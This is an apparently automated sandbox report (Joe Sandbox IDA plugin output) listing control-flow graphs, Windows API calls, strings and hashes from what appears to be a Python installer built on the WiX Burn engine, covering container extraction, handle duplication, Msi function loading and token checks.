                                                                                                                                  control_flow_graph 1303 484361-4843b8 InitializeCriticalSection * 2 call 494d76 * 2 1308 4844dc-4844e6 call 48b54b 1303->1308 1309 4843be 1303->1309 1314 4844eb-4844ef 1308->1314 1310 4843c4-4843d1 1309->1310 1312 4844cf-4844d6 1310->1312 1313 4843d7-484403 lstrlenW * 2 CompareStringW 1310->1313 1312->1308 1312->1310 1315 484455-484481 lstrlenW * 2 CompareStringW 1313->1315 1316 484405-484428 lstrlenW 1313->1316 1317 4844fe-484504 1314->1317 1318 4844f1-4844fd call 4c0657 1314->1318 1315->1312 1319 484483-4844a6 lstrlenW 1315->1319 1320 48442e-484433 1316->1320 1321 484512-484527 call 4838f5 1316->1321 1318->1317 1324 4844ac-4844b1 1319->1324 1325 48453e-484558 call 4838f5 1319->1325 1320->1321 1326 484439-484449 call 482aea 1320->1326 1332 48452c-484533 1321->1332 1324->1325 1329 4844b7-4844c7 call 482aea 1324->1329 1325->1332 1336 48444f 1326->1336 1337 484507-484510 1326->1337 1329->1337 1341 4844c9 1329->1341 1338 484534-48453c call 4c0657 1332->1338 1336->1315 1337->1338 1338->1317 1341->1312
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,004852DE,?,?,00000000,?,?), ref: 0048438D
                                                                                                                                  • InitializeCriticalSection.KERNEL32(000000D0,?,?,004852DE,?,?,00000000,?,?), ref: 00484396
                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,004852DE,?,?,00000000,?,?), ref: 004843DC
                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,004852DE,?,?,00000000,?,?), ref: 004843E6
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,004852DE,?,?,00000000,?,?), ref: 004843FA
                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,004852DE,?,?,00000000,?,?), ref: 0048440A
                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,?,?,004852DE,?,?,00000000,?,?), ref: 0048445A
                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,004852DE,?,?,00000000,?,?), ref: 00484464
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,004852DE,?,?,00000000,?,?), ref: 00484478
                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,?,?,004852DE,?,?,00000000,?,?), ref: 00484488
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                  • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$c:\agent\_work\138\s\src\burn\engine\engine.cpp
                                                                                                                                  • API String ID: 3039292287-4238739692
                                                                                                                                  • Opcode ID: d556a05a50ed49749ebb487ff7e6eb6cb66b6af4be9a1b560de92916d99b7412
                                                                                                                                  • Instruction ID: 796687f1302913dc540d995b596af162bedf85da2834cbf4e1023e2fba9e52a5
                                                                                                                                  • Opcode Fuzzy Hash: d556a05a50ed49749ebb487ff7e6eb6cb66b6af4be9a1b560de92916d99b7412
                                                                                                                                  • Instruction Fuzzy Hash: E651D2B5A00216BFC764AB68DC87F9E7768EF40B60F10451BF614D7290DB78A910CBE8

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1343 48c343-48c375 1344 48c3df-48c3fb GetCurrentProcess * 2 DuplicateHandle 1343->1344 1345 48c377-48c395 CreateFileW 1343->1345 1346 48c3fd-48c407 GetLastError 1344->1346 1347 48c435 1344->1347 1348 48c39b-48c3a5 GetLastError 1345->1348 1349 48c437-48c43d 1345->1349 1350 48c409-48c412 1346->1350 1351 48c414 1346->1351 1347->1349 1352 48c3b2 1348->1352 1353 48c3a7-48c3b0 1348->1353 1354 48c43f-48c445 1349->1354 1355 48c447 1349->1355 1350->1351 1357 48c41b-48c433 call 4838f5 1351->1357 1358 48c416 1351->1358 1359 48c3b9-48c3cc call 4838f5 1352->1359 1360 48c3b4 1352->1360 1353->1352 1356 48c449-48c457 SetFilePointerEx 1354->1356 1355->1356 1362 48c459-48c463 GetLastError 1356->1362 1363 48c48e-48c494 1356->1363 1371 48c3d1-48c3da call 4c0657 1357->1371 1358->1357 1359->1371 1360->1359 1366 48c470 1362->1366 1367 48c465-48c46e 1362->1367 1368 48c4b2-48c4b8 1363->1368 1369 48c496-48c49a call 4a15f7 1363->1369 1372 48c472 1366->1372 1373 48c477-48c48c call 4838f5 1366->1373 1367->1366 1377 48c49f-48c4a3 1369->1377 1371->1368 1372->1373 1381 48c4aa-48c4b1 call 4c0657 1373->1381 1377->1368 1380 48c4a5 1377->1380 1380->1381 1381->1368
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0048C533,?,?,?,?), ref: 0048C38A
                                                                                                                                  • GetLastError.KERNEL32(?,0048C533,?,?,?,?,?,00000000,?,00000000), ref: 0048C39B
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0048C533,?,?,?,?,?,00000000,?), ref: 0048C3EA
                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0048C533,?,?,?,?,?,00000000,?,00000000), ref: 0048C3F0
                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,0048C533,?,?,?,?,?,00000000,?,00000000), ref: 0048C3F3
                                                                                                                                  • GetLastError.KERNEL32(?,0048C533,?,?,?,?,?,00000000,?,00000000), ref: 0048C3FD
                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0048C533,?,?,?,?,?,00000000,?,00000000), ref: 0048C44F
                                                                                                                                  • GetLastError.KERNEL32(?,0048C533,?,?,?,?,?,00000000,?,00000000), ref: 0048C459
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                  • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$c:\agent\_work\138\s\src\burn\engine\container.cpp$crypt32.dll$feclient.dll
                                                                                                                                  • API String ID: 2619879409-2236165814
                                                                                                                                  • Opcode ID: 1be131a8211db94f79a1adca92edaa082b608b1c1b33b031712213ee0fd0365d
                                                                                                                                  • Instruction ID: bf82dbe428ff3e84325a68ecba2fdc653949364ff0269bc0ce807f6bafad07b5
                                                                                                                                  • Opcode Fuzzy Hash: 1be131a8211db94f79a1adca92edaa082b608b1c1b33b031712213ee0fd0365d
                                                                                                                                  • Instruction Fuzzy Hash: 6A41A836140241ABC720AF5A9C89F1B7A69EBC4B60F21842BFD589B341D779C841D7B8

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1384 4c2f7b-4c2f9b call 48390c 1387 4c30a5-4c30a9 1384->1387 1388 4c2fa1-4c2faf call 4c4ea2 1384->1388 1390 4c30ab-4c30ae call 48278d 1387->1390 1391 4c30b3-4c30b7 1387->1391 1392 4c2fb4-4c2fd3 GetProcAddress 1388->1392 1390->1391 1394 4c2fda-4c2ff3 GetProcAddress 1392->1394 1395 4c2fd5 1392->1395 1396 4c2ffa-4c3013 GetProcAddress 1394->1396 1397 4c2ff5 1394->1397 1395->1394 1398 4c301a-4c3033 GetProcAddress 1396->1398 1399 4c3015 1396->1399 1397->1396 1400 4c303a-4c3053 GetProcAddress 1398->1400 1401 4c3035 1398->1401 1399->1398 1402 4c305a-4c3073 GetProcAddress 1400->1402 1403 4c3055 1400->1403 1401->1400 1404 4c307a-4c3094 GetProcAddress 1402->1404 1405 4c3075 1402->1405 1403->1402 1406 4c309b 1404->1406 1407 4c3096 1404->1407 1405->1404 1406->1387 1407->1406
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0048390C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0048394B
                                                                                                                                    • Part of subcall function 0048390C: GetLastError.KERNEL32 ref: 00483955
                                                                                                                                    • Part of subcall function 004C4EA2: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 004C4ED3
                                                                                                                                  • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 004C2FC5
                                                                                                                                  • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 004C2FE5
                                                                                                                                  • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 004C3005
                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 004C3025
                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 004C3045
                                                                                                                                  • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 004C3065
                                                                                                                                  • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 004C3085
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                  • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                  • API String ID: 2510051996-1735120554
                                                                                                                                  • Opcode ID: b76e297300298a4fd031616b7b8bfc61bb21dd75605742b9bbef48c6abae78ca
                                                                                                                                  • Instruction ID: e076f5394dd80208c0da1a2e1a520ce79055052eb024d676f4e6607fc7be45b1
                                                                                                                                  • Opcode Fuzzy Hash: b76e297300298a4fd031616b7b8bfc61bb21dd75605742b9bbef48c6abae78ca
                                                                                                                                  • Instruction Fuzzy Hash: 2C312D759803DAEAD712AF26EED6B163BA0EB11747F10413BE4005A2B2D7B90943DF4C

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1452 4a15f7-4a1617 call 4822c9 1455 4a1619-4a161e 1452->1455 1456 4a1623-4a1635 CreateEventW 1452->1456 1457 4a170f-4a1716 call 4c0657 1455->1457 1458 4a166f-4a167b CreateEventW 1456->1458 1459 4a1637-4a1641 GetLastError 1456->1459 1472 4a1717-4a171d 1457->1472 1462 4a167d-4a1687 GetLastError 1458->1462 1463 4a16b2-4a16c7 CreateThread 1458->1463 1460 4a164e 1459->1460 1461 4a1643-4a164c 1459->1461 1468 4a1650 1460->1468 1469 4a1655-4a166a call 4838f5 1460->1469 1461->1460 1470 4a1689-4a1692 1462->1470 1471 4a1694 1462->1471 1466 4a16c9-4a16d3 GetLastError 1463->1466 1467 4a16fe-4a1708 call 4a139a 1463->1467 1473 4a16e0 1466->1473 1474 4a16d5-4a16de 1466->1474 1467->1472 1486 4a170a 1467->1486 1468->1469 1469->1457 1470->1471 1477 4a169b-4a16b0 call 4838f5 1471->1477 1478 4a1696 1471->1478 1480 4a16e2 1473->1480 1481 4a16e7-4a16fc call 4838f5 1473->1481 1474->1473 1477->1457 1478->1477 1480->1481 1481->1457 1486->1457
                                                                                                                                  APIs
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0048C49F,?,00000000,?,0048C533), ref: 004A162E
                                                                                                                                  • GetLastError.KERNEL32(?,0048C49F,?,00000000,?,0048C533,?,?,?,?,?,00000000,?,00000000), ref: 004A1637
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cabextract.cpp, xrefs: 004A165B, 004A16A1, 004A16ED
                                                                                                                                  • wininet.dll, xrefs: 004A160D
                                                                                                                                  • Failed to copy file name., xrefs: 004A1619
                                                                                                                                  • Failed to wait for operation complete., xrefs: 004A170A
                                                                                                                                  • Failed to create begin operation event., xrefs: 004A1665
                                                                                                                                  • Failed to create operation complete event., xrefs: 004A16AB
                                                                                                                                  • Failed to create extraction thread., xrefs: 004A16F7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                  • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp$wininet.dll
                                                                                                                                  • API String ID: 545576003-9491624
                                                                                                                                  • Opcode ID: 4a4b08becebbd58886cf1211b402cf0998021b01a7df402f94d8017d5079d12d
                                                                                                                                  • Instruction ID: 3707a66da7b06dd951bb715b247ad107259f33f7f7321b4067ee5d43b0a6423c
                                                                                                                                  • Opcode Fuzzy Hash: 4a4b08becebbd58886cf1211b402cf0998021b01a7df402f94d8017d5079d12d
                                                                                                                                  • Instruction Fuzzy Hash: CC214777A4173677A22066A54C56F2B6A5CAF22BA5F110227FC40FB790EB5CDC0086ED

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1488 4c00c9-4c00e4 call 4838f8 1491 4c010c 1488->1491 1492 4c00e6-4c010a GetProcAddress * 2 1488->1492 1493 4c0111-4c0118 1491->1493 1492->1493 1494 4c011a-4c011c 1493->1494 1495 4c0122-4c0135 call 4838f8 1493->1495 1494->1495 1496 4c01c9 1494->1496 1499 4c01d3-4c01d7 1495->1499 1500 4c013b-4c0154 GetProcAddress 1495->1500 1496->1499 1501 4c0156-4c0158 1500->1501 1502 4c0187-4c01a0 GetProcAddress 1500->1502 1501->1502 1504 4c015a-4c0164 GetLastError 1501->1504 1502->1496 1503 4c01a2-4c01a4 1502->1503 1503->1496 1505 4c01a6-4c01b0 GetLastError 1503->1505 1506 4c0166-4c016f 1504->1506 1507 4c0171 1504->1507 1510 4c01bd 1505->1510 1511 4c01b2-4c01bb 1505->1511 1506->1507 1508 4c0178-4c0179 1507->1508 1509 4c0173 1507->1509 1512 4c017b-4c0185 call 4838f5 1508->1512 1509->1508 1513 4c01bf 1510->1513 1514 4c01c4-4c01c7 1510->1514 1511->1510 1512->1499 1513->1514 1514->1512
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 004C00F1
                                                                                                                                  • GetProcAddress.KERNEL32(SystemFunction041), ref: 004C0103
                                                                                                                                  • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 004C0146
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 004C015A
                                                                                                                                  • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 004C0192
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 004C01A6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ErrorLast
                                                                                                                                  • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$c:\agent\_work\138\s\src\libs\dutil\cryputil.cpp
                                                                                                                                  • API String ID: 4214558900-403682633
                                                                                                                                  • Opcode ID: f7b977d938d249e63c6f7004b3254452c8a43a6ac67c553b4348ad8332addb17
                                                                                                                                  • Instruction ID: 06825abb43159c0141542e3306fda6e20b3616fa3db645d82c0933a6fc5a1562
                                                                                                                                  • Opcode Fuzzy Hash: f7b977d938d249e63c6f7004b3254452c8a43a6ac67c553b4348ad8332addb17
                                                                                                                                  • Instruction Fuzzy Hash: 4721B83E9413A1D7C7616B26AC89F17B991B711B91F1A017BEC00BA261DB6D8C018BDC

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1517 4a0785-4a07be CompareStringA 1518 4a083b-4a0859 CreateFileA 1517->1518 1519 4a07c0-4a07dd GetCurrentProcess * 2 DuplicateHandle 1517->1519 1520 4a089a-4a089f 1518->1520 1521 4a085b-4a0865 GetLastError 1518->1521 1522 4a07df-4a07e9 GetLastError 1519->1522 1523 4a081c-4a0832 call 4a061c 1519->1523 1524 4a08a1 1520->1524 1525 4a08a4-4a08aa 1520->1525 1527 4a0872 1521->1527 1528 4a0867-4a0870 1521->1528 1529 4a07eb-4a07f4 1522->1529 1530 4a07f6 1522->1530 1523->1520 1536 4a0834-4a0839 1523->1536 1524->1525 1532 4a0879-4a0897 call 4838f5 call 4c0657 1527->1532 1533 4a0874 1527->1533 1528->1527 1529->1530 1534 4a07f8 1530->1534 1535 4a07fd-4a080d call 4838f5 1530->1535 1532->1520 1533->1532 1534->1535 1539 4a0812-4a081a call 4c0657 1535->1539 1536->1539 1539->1520
                                                                                                                                  APIs
                                                                                                                                  • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 004A07B5
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 004A07CD
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 004A07D2
                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 004A07D5
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 004A07DF
                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 004A084E
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 004A085B
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cabextract.cpp, xrefs: 004A0803, 004A087F
                                                                                                                                  • Failed to add virtual file pointer for cab container., xrefs: 004A0834
                                                                                                                                  • <the>.cab, xrefs: 004A07AE
                                                                                                                                  • Failed to open cabinet file: %hs, xrefs: 004A088C
                                                                                                                                  • Failed to duplicate handle to cab container., xrefs: 004A080D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                  • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp
                                                                                                                                  • API String ID: 3030546534-4070612573
                                                                                                                                  • Opcode ID: 1de0e2f3f1fa351d38c89628e79f5367b448711240aa9ef3f1437834833a4cf3
                                                                                                                                  • Instruction ID: 32185d2bd8c14ff78151c9045018507fa0813b95c8b701966286fdf566bef04e
                                                                                                                                  • Opcode Fuzzy Hash: 1de0e2f3f1fa351d38c89628e79f5367b448711240aa9ef3f1437834833a4cf3
                                                                                                                                  • Instruction Fuzzy Hash: 6231F376941235FBD721AB558C09F8F7E68EF15BA1F11012BF904B7250D72C9D1086EC
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNELBASE(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 004C0DBF
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 004C0DC9
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 004C0E12
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 004C0E1F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                  • String ID: "%ls" %ls$D$c:\agent\_work\138\s\src\libs\dutil\procutil.cpp
                                                                                                                                  • API String ID: 161867955-337939606
                                                                                                                                  • Opcode ID: 0ea61a86f32198ba189f7093fb1b01dca83ede5541535409aff60834e631595d
                                                                                                                                  • Instruction ID: 0ce7280590043782d7bdf6ac2e1178ae5ee49a27333dc540b67a022598929c14
                                                                                                                                  • Opcode Fuzzy Hash: 0ea61a86f32198ba189f7093fb1b01dca83ede5541535409aff60834e631595d
                                                                                                                                  • Instruction Fuzzy Hash: A1213EB590025AEBDB519FD5CD41EAFBBB8EF04754F10442AEA01B7210D3749E04DBA9
                                                                                                                                  APIs
                                                                                                                                  • OpenProcessToken.ADVAPI32(?,00000008,?,5TH,00000000,?,?,?,?,?,?,?,00497696,00000000), ref: 004C0CAD
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00497696,00000000), ref: 004C0CB7
                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,00497696,00000000), ref: 004C0CE9
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00497696,00000000), ref: 004C0D02
                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00497696,00000000), ref: 004C0D41
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\procutil.cpp, xrefs: 004C0D2F
                                                                                                                                  • 5TH, xrefs: 004C0C96
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                  • String ID: 5TH$c:\agent\_work\138\s\src\libs\dutil\procutil.cpp
                                                                                                                                  • API String ID: 4040495316-998064274
                                                                                                                                  • Opcode ID: 84dc74395da075e7c50e7edb1233ef6db3be2cf159d2549ebbf6a85b72c3bc61
                                                                                                                                  • Instruction ID: e7dc4e8e722e9c368e87a326269b4a10ec2cf8b4c6542c691ad767ce1a303c0c
                                                                                                                                  • Opcode Fuzzy Hash: 84dc74395da075e7c50e7edb1233ef6db3be2cf159d2549ebbf6a85b72c3bc61
                                                                                                                                  • Instruction Fuzzy Hash: 3721D47AD00228EBC7619F958C05FAFBAB8EF00711F11416BED56BB250D3389E00DAD8
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 004C4ED3
                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 004C4F00
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 004C4F2C
                                                                                                                                  • GetLastError.KERNEL32(00000000,004CB7FC,?,00000000,?,00000000,?,00000000), ref: 004C4F6A
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004C4F9B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Global$AllocFree
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp
